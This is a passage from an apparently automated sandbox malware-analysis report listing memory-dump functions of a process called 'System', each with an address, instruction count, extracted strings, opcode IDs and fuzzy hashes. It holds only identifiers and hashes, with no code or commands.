              • String ID:
              • API String ID:
              • Opcode ID: df2493e0963c1c91a339f43cf77660cea31e42a855af3e263d046ba6320c937e
              • Instruction ID: a673b218583291713dacfd7fc29c623179a770212484b254837a8e3e5840773f
              • Opcode Fuzzy Hash: df2493e0963c1c91a339f43cf77660cea31e42a855af3e263d046ba6320c937e
              • Instruction Fuzzy Hash: 65018B70A1864A8FE791FB7484DC6BA7BE0EF1A300F4149B6D508C61A2EB38F584C780
              Function 00007FFD3479284D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5efec347a3efb2d87f6cc6f73a3a86b7867aa2e77980edae6e861b11f66fd071
              • Instruction ID: f9dc64d660921ffce4f953f3a55505cfe6bd6162e72093a6b1d5e00265357db7
              • Opcode Fuzzy Hash: 5efec347a3efb2d87f6cc6f73a3a86b7867aa2e77980edae6e861b11f66fd071
              • Instruction Fuzzy Hash: 6001D471A1868ECFE7D1BB2884989B97BE0EF1A310F4149B6D518C6092EE38F044C780
              Function 00007FFD34792EE9 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 886cb8e401c0d29e181e2d999a10c43fa2962b0ddb814d0c795fe67e61277445
              • Instruction ID: 6d6a591d9bf166478972b7e7caa1dd29f25e2d88010a3bc8a6c5817b3150e83c
              • Opcode Fuzzy Hash: 886cb8e401c0d29e181e2d999a10c43fa2962b0ddb814d0c795fe67e61277445
              • Instruction Fuzzy Hash: E7018F71A1D6498FE782FB7488A95A97BE1EF0B300F0549F6D408CB0A3DA3CB444C751
              Function 00007FFD347A7B19 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea110656f94ea530e5b524a184ea1623bd042073faefb18341ef95c1eabc9e26
              • Instruction ID: f3d6cb5370f0629b9333d02939167cd0ef3abde781f5232a1418594489b5d026
              • Opcode Fuzzy Hash: ea110656f94ea530e5b524a184ea1623bd042073faefb18341ef95c1eabc9e26
              • Instruction Fuzzy Hash: BE0175B1A4E6498FE791A77488A91E97BF0EF16300F0544F6D509C7162DA38E548C751
              Function 00007FFD347A82CD Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 848a030f9d15a90a7747405d2cdf0c4aedcf12015d86fdd237357d40c154c80b
              • Instruction ID: a5900eade6a3b2487f7db60d3a9119ce29d8eba552f0a1c92246e7a3b376e169
              • Opcode Fuzzy Hash: 848a030f9d15a90a7747405d2cdf0c4aedcf12015d86fdd237357d40c154c80b
              • Instruction Fuzzy Hash: A001D430A09249CFDB99DF64C4A42FE3BA0FF06300F0114BED51AC6292DA39A554C780
              Function 00007FFD34790608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b2d3690e3aac52f49dac0d049a9da66f61b181b8e6fbe78ad2083aecd02746d0
              • Instruction ID: c25e43723a6125e95cc3e017efc9e73b18d8e0c952d59c979d224e4a7b55a458
              • Opcode Fuzzy Hash: b2d3690e3aac52f49dac0d049a9da66f61b181b8e6fbe78ad2083aecd02746d0
              • Instruction Fuzzy Hash: EA018170A1450ECEEB98FB64C4A82BA73A4FF19305F104C7ED50EE22D1DE39B550C640
              Function 00007FFD34790610 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f2fad06460ea2fe1c1ac45e68120ef5596ec14382a153289c8c43d1b76a1527
              • Instruction ID: 339ba46b9f96ea1884734815111757da7ff0169d9367bbe69de3018cec703850
              • Opcode Fuzzy Hash: 2f2fad06460ea2fe1c1ac45e68120ef5596ec14382a153289c8c43d1b76a1527
              • Instruction Fuzzy Hash: 28016D70A1890ECAEB98EB6484A96B973A0FF1A305F10487ED40ED21D1DF39B550D640
              Function 00007FFD34791C7D Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aff93a15471616730a0635180e0c2e506a5bb7cb6deaa9811ecc5037dc61cadf
              • Instruction ID: d2f433af157f138d4d6a51be7ca527cbebd9d60825ce2199fa322e9d650de01d
              • Opcode Fuzzy Hash: aff93a15471616730a0635180e0c2e506a5bb7cb6deaa9811ecc5037dc61cadf
              • Instruction Fuzzy Hash: 48F0C270A4964ECFEB94DF24C4A52BA37A0FF57304F80017AE90CC2192DB39E964D780
              Function 00007FFD3479CCD8 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8725dd1e49dbce8b13e96ab6838de7618d29e6cd798caecd09e5dca4ba976005
              • Instruction ID: 256011da352b979694d3857037d6ff50f91db3b55743164703bf94b9bcb81bfc
              • Opcode Fuzzy Hash: 8725dd1e49dbce8b13e96ab6838de7618d29e6cd798caecd09e5dca4ba976005
              • Instruction Fuzzy Hash: 9BF03170A0964ACFEF54EF68D4A92FA7BA0FF06314F04057AE919C2152DB786560D780
              Function 00007FFD3479AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7fd0823b1b93ee588945a1ea4769201aff8880a996ba32f055c0420626ade77
              • Instruction ID: b9b5e6b1ef98ddc6e9f77b727f06589e5b05da55cc0d4da13d794b36763cbe11
              • Opcode Fuzzy Hash: b7fd0823b1b93ee588945a1ea4769201aff8880a996ba32f055c0420626ade77
              • Instruction Fuzzy Hash: D1F0AF71A1E64EDEEBA1EB3884DA5ED77E0EF4A300F0048B2D508C2052EE38B454D680
              Function 00007FFD34792769 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a1dfc15689188b0977a325642bd7dce2fc89d44b39e5e492ebc23112d56bb68
              • Instruction ID: 0b84950538ea7ba3c87341646845281601f0824a8a249b32fc8b1cf10b21ca19
              • Opcode Fuzzy Hash: 3a1dfc15689188b0977a325642bd7dce2fc89d44b39e5e492ebc23112d56bb68
              • Instruction Fuzzy Hash: A5F0907190D3898FEB99EF24C8B92A93BA4FF07210F4509FAD609C61D2DB3CA454C791
              Function 00007FFD347A1240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1a784c8c15a9aeee82032a15ff61d10198ec1529bf50b9ae42fb3fcd59fa39e
              • Instruction ID: 55c790928a21c791db5ed011392faaa7d6af8181f8624b18fb66385dbc98653e
              • Opcode Fuzzy Hash: d1a784c8c15a9aeee82032a15ff61d10198ec1529bf50b9ae42fb3fcd59fa39e
              • Instruction Fuzzy Hash: 45F05E70A1954E8EEB84EF6898582FE76A0FF15305F00053AE82DC22D0DF38A550C681
              Function 00007FFD347927DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa847d58b99639c95af9aeb9c7dea607b7fc0168b02285afde4a9977f92771c8
              • Instruction ID: e9b7101e98bae1ef167db31ee1db34ec6f210baa9e60c41a566d2130f76b3bc8
              • Opcode Fuzzy Hash: fa847d58b99639c95af9aeb9c7dea607b7fc0168b02285afde4a9977f92771c8
              • Instruction Fuzzy Hash: 3DF0F071A0D68A8FEB99AF2088A52B93BA0BF46304F0008BAD909C20D2DB3DA414C340
              Function 00007FFD3479BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab344336a9c1ad8bba5d4cf774d3ec68550ddde18bd1372fcd09820d1935ce7b
              • Instruction ID: 92493151104bd069dd7e70e23974698e1eb6a5c5e34f1792a83c1c3294e15d8e
              • Opcode Fuzzy Hash: ab344336a9c1ad8bba5d4cf774d3ec68550ddde18bd1372fcd09820d1935ce7b
              • Instruction Fuzzy Hash: D4D0626095C41BC9DBA0E614C494EFD7264AB56300F2095B1911DE2196DD7879C56B80
              Function 00007FFD347A58EB Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a709648e009f01986e12338013f2aff8a82a8c6e0990f82fd7cf9820204bf8f0
              • Instruction ID: 4f204f9d8de6efadd2960b7e7242eb8d40dcfdfd75ca48e1945d64d1aa3b8436
              • Opcode Fuzzy Hash: a709648e009f01986e12338013f2aff8a82a8c6e0990f82fd7cf9820204bf8f0
              • Instruction Fuzzy Hash: 56C012D2F1D51D8EEB94D90844D51BC66E1EB14244B000031D00CC3251DE1874016340

              Non-executed Functions

              Function 00007FFD347A050C Relevance: 5.0, Strings: 4, Instructions: 36COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: H$K$L${
              • API String ID: 0-964284359
              • Opcode ID: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction ID: 8ddb1f35b2d5f42fa3203e56c6d9b7a91a9c71a496e719c56baa5729303c5e68
              • Opcode Fuzzy Hash: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction Fuzzy Hash: 9401C0B4E1922ACAEF688F14D5A47FD7675AF56300F0044B9C20DA6281DB3C6A85DF81

              Executed Functions

              Function 00007FFD347ADBA8 Relevance: 3.1, Strings: 2, Instructions: 591COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: Nh4$p\h4
              • API String ID: 0-3373656701
              • Opcode ID: b230fc0ce03960c42c5c9153b79afbff570c4a90f90ad7d338d867ab7e87fa86
              • Instruction ID: 4806b6d830fdaf4d0412d85b7108e6298bd104c3286c3c879edfcdc05957eec4
              • Opcode Fuzzy Hash: b230fc0ce03960c42c5c9153b79afbff570c4a90f90ad7d338d867ab7e87fa86
              • Instruction Fuzzy Hash: 5A224D71E196498FEB98DB68C4A47F9BBF1FF59304F1440BAD00DE7292DA386844DB41
              Function 00007FFD347A102F Relevance: 1.7, Strings: 1, Instructions: 439COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: pyi4
              • API String ID: 0-2228226052
              • Opcode ID: e90e723b29662f0508da33fc61a07bcd856a5e9a6a962638745678c07fc619ee
              • Instruction ID: 6af1ccaf9ead1ab4fcb622a80be58aa5bdb458feeb5c98e88e8bc99b2d15110c
              • Opcode Fuzzy Hash: e90e723b29662f0508da33fc61a07bcd856a5e9a6a962638745678c07fc619ee
              • Instruction Fuzzy Hash: 65E10771A0D64A8FE795DF68C8A86F97BF0FF1A300F0445BAD509D7292DA38B444C780
              Function 00007FFD347A2C60 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: (z4
              • API String ID: 0-3915740135
              • Opcode ID: 24b69e408191db63f546e7d99418712a996a11dc1acd371953b772a53dfd805a
              • Instruction ID: 86280733425d48dff7101e7569c446a208030ae481bf68c827c44be0e6734776
              • Opcode Fuzzy Hash: 24b69e408191db63f546e7d99418712a996a11dc1acd371953b772a53dfd805a
              • Instruction Fuzzy Hash: 19D1E371A0D64A8FE781EB78C8A96FA7BF0EF16310F0445B6D508D72A2DA3CB554D780
              Function 00007FFD347AC920 Relevance: .6, Instructions: 587COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1219c8218259cf874aa025980db305efe70e87a95971a91a3ecc0327b193849b
              • Instruction ID: 2ef3a6229c1fffa4e8f90db8827ddf960e1340172051b00c3bdd99d8503d8208
              • Opcode Fuzzy Hash: 1219c8218259cf874aa025980db305efe70e87a95971a91a3ecc0327b193849b
              • Instruction Fuzzy Hash: 07022772B0DA5A9FE751FB7CA4A50FE7BA0EF46324B0401BBC148CB193DA2874498790
              Function 00007FFD347AC737 Relevance: .5, Instructions: 541COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84255e8235df4e5749afd51d93c607925e5a558bbe893e480b9fc3dd5f39caea
              • Instruction ID: f210a8ca93a95fa535138a5e25caedacd9f623c4afa23b2ed11613dbc50b7e36
              • Opcode Fuzzy Hash: 84255e8235df4e5749afd51d93c607925e5a558bbe893e480b9fc3dd5f39caea
              • Instruction Fuzzy Hash: 6F02C072A0D68A9FE795AB6898651FA3BB0FF07324F0441BBD548CB193DA3C6445C781
              Function 00007FFD347A3350 Relevance: .5, Instructions: 515COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 027db3f30138677291d9627ee8aba2744224875899c3e5943217698686bf0282
              • Instruction ID: b0ea1699220a11ee13bd881adc90a696af006693492e497c5587138c7a12aaf7
              • Opcode Fuzzy Hash: 027db3f30138677291d9627ee8aba2744224875899c3e5943217698686bf0282
              • Instruction Fuzzy Hash: 0802D171A0DA4E8FE795EF68C8A83A97BE0FF5A300F4001BAC409D7292DB786445C741
              Function 00007FFD347AD120 Relevance: .4, Instructions: 388COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a4615fa23bfcba2435630409e72eaecdfa549d62dffd79a569b119e10b117025
              • Instruction ID: 9b0597e48c8b3e52e7c90576562a931d4a4414c6d40cf1cfd1edc0bab27cf330
              • Opcode Fuzzy Hash: a4615fa23bfcba2435630409e72eaecdfa549d62dffd79a569b119e10b117025
              • Instruction Fuzzy Hash: 3FD1C970A0864A8FEBA5EF2484A92BD7BF1FF16300F0045BED509D71A2DE787954D782
              Function 00007FFD347ABD8B Relevance: .4, Instructions: 375COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ecf7a23147ab18d3bd793c9230e1de3756639d3fed6429550d49898189f2204a
              • Instruction ID: c2346edb21879ccdd327930f5731a670179f67cc19fa5415412025f1ae28e592
              • Opcode Fuzzy Hash: ecf7a23147ab18d3bd793c9230e1de3756639d3fed6429550d49898189f2204a
              • Instruction Fuzzy Hash: 94D17170A19649CFE795EB64C4A96FA7BF0FF0A300F0144BAD609D7292DA38B544CB80
              Function 00007FFD347B27A0 Relevance: .3, Instructions: 276COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8715e498085a8b7de97c3aa6293b85e01cf48475f1e698a6ff77c8182e51e8ab
              • Instruction ID: 047c5c37db55cb9b473aeba8f0026bae860be7f8b352113d99c097e58090a710
              • Opcode Fuzzy Hash: 8715e498085a8b7de97c3aa6293b85e01cf48475f1e698a6ff77c8182e51e8ab
              • Instruction Fuzzy Hash: B8919D70A1964ACFDB94EF24C4A96FA7BE1FF1A300F00457AD50AD3192DE78A945CB80
              Function 00007FFD347B2730 Relevance: .2, Instructions: 248COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c06e54e3be40fbec73ec528103bcf6507af6cb9d7675ded74cf7c105fd0dd83e
              • Instruction ID: 09a49a259633baedccc6101231240171dc8cf7212442c3f1dc01425040a46820
              • Opcode Fuzzy Hash: c06e54e3be40fbec73ec528103bcf6507af6cb9d7675ded74cf7c105fd0dd83e
              • Instruction Fuzzy Hash: 8981A270A1D74ACFEB559F2488A92FA3BE0FF0A300F01457AE949C2192DF78A945D7C1
              Function 00007FFD347AEB56 Relevance: 3.8, Strings: 3, Instructions: 53COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction ID: d1e200fc29c8c904bf725d33b74e8cd1ce99589df2bc24c432a49571a31a043c
              • Opcode Fuzzy Hash: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction Fuzzy Hash: 9321CDB0D1A229CFEBA4DF14C8947E976B1AF55301F0041F9D60DD2281CB786A94DF85
              Function 00007FFD347AED26 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: e791c6295a61a9f11e98f9ffcf2b76906e738f39c70009d2672b4678b7612fbf
              • Instruction ID: 5940808f275de90bc62bf63ce5407332fbe377698e542e2df28e9234c96f12ce
              • Opcode Fuzzy Hash: e791c6295a61a9f11e98f9ffcf2b76906e738f39c70009d2672b4678b7612fbf
              • Instruction Fuzzy Hash: ED412A71A19A598FDBA8DB18CC95BAEB7B1FB54301F1002EAD04DE3291DE356EC18F40
              Function 00007FFD347A1260 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: pyi4
              • API String ID: 0-2228226052
              • Opcode ID: bc187f8b888b79230f0decefbfe956a9c89a7ec6a91c027f693d10a70266f233
              • Instruction ID: c33096e8457a26cd4b40b1c6707d5710c23435d0cfcd263e6eeac2a34f13bce2
              • Opcode Fuzzy Hash: bc187f8b888b79230f0decefbfe956a9c89a7ec6a91c027f693d10a70266f233
              • Instruction Fuzzy Hash: 77318471B0A64E8FFB98DF6888A46F977E0FF5A315F04017AD549D72D2DA28B804C781
              Function 00007FFD347AC562 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: P_H
              • API String ID: 0-1734449649
              • Opcode ID: 50e4d2e2969629715f746c3d30680aacff64a134038e55f1a2e6e74d818cc73d
              • Instruction ID: a185cd8c8ad96fc1dc65d945a3916034cb73b95a2c151e18d2416512acb469d4
              • Opcode Fuzzy Hash: 50e4d2e2969629715f746c3d30680aacff64a134038e55f1a2e6e74d818cc73d
              • Instruction Fuzzy Hash: 5D31FBB5E1991DDFEBD4EB58D8A96ECB7B1FFA9300F501039D10DE3281DE2868419B40
              Function 00007FFD347A0A01 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: 8vi4
              • API String ID: 0-3509338091
              • Opcode ID: 8320e2b970e73d32733d10cab21b9b37a46c203007916ace0eee36d1e0e959bc
              • Instruction ID: 45555f3784a751c2a8844f7d5b3c4c8a800bf4089405a0542053d74d987a1b99
              • Opcode Fuzzy Hash: 8320e2b970e73d32733d10cab21b9b37a46c203007916ace0eee36d1e0e959bc
              • Instruction Fuzzy Hash: EA119E75E1954E8FE790EF6888A91BE77E1FF1A300F4149B6C409D22A2EE38B544D780
              Function 00007FFD347AD0A8 Relevance: .6, Instructions: 578COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 33ec834b9a360417fae2404961942dc06cb13b996f34909ad8c1f151abe79fad
              • Instruction ID: aec071b6d28694cb5770b57c36fc78d4dd2f24b097c30167f3c416524a3f0180
              • Opcode Fuzzy Hash: 33ec834b9a360417fae2404961942dc06cb13b996f34909ad8c1f151abe79fad
              • Instruction Fuzzy Hash: 3B81FAA2E0E6C68FE752977448A91A97FE0FF13210F0905FBD598CB193ED686844D381
              Function 00007FFD347AAFB8 Relevance: .4, Instructions: 357COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3284de0d8e4c331f2064899e946fcba3e7fa0713161daed1b01f950b34e0c052
              • Instruction ID: 9d40e3d6215a964ecc8a5eaf24d11a4fb906d1e3b94d004ef081ddea88359db4
              • Opcode Fuzzy Hash: 3284de0d8e4c331f2064899e946fcba3e7fa0713161daed1b01f950b34e0c052
              • Instruction Fuzzy Hash: 01D1F871E19699CFDBA8EBA8C4A46BCB7B1FF5A301F104179D00DE2292CF796841DB41
              Function 00007FFD347AC998 Relevance: .3, Instructions: 314COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 19c473ed974dca6a0cc3ec435928149c21b022eaac8514df47642628b1b0577a
              • Instruction ID: e81aac9d31e45cf29db4082021da0f68e69d48e3146b3b43f048775925ec2f4e
              • Opcode Fuzzy Hash: 19c473ed974dca6a0cc3ec435928149c21b022eaac8514df47642628b1b0577a
              • Instruction Fuzzy Hash: 50A1E376A0DA5B9FE791FB6CA4661FE7BA0EF42324F0401B7D148CB193DA28744987C1
              Function 00007FFD347A2115 Relevance: .3, Instructions: 308COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000020.00000002.2233704991.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
